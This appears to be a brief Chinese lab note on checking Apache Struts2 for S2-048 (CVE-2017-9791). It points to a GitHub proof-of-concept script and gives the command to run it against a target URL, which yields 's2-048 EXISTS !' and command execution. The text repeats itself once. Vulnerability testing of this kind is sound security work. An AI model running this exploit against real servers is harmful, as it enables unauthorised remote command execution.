GitHub - dragoneeg/Struts2-048: CVE-2017-9791
github下載下傳POC
python2 Struts048.py http://ip:port/integration/saveGangster.action
使用POC腳本檢測, 傳回值是 s2-048 EXISTS !
證明漏洞存在,指令執行成功
GitHub - dragoneeg/Struts2-048: CVE-2017-9791
github下載下傳POC
python2 Struts048.py http://ip:port/integration/saveGangster.action
使用POC腳本檢測, 傳回值是 s2-048 EXISTS !
證明漏洞存在,指令執行成功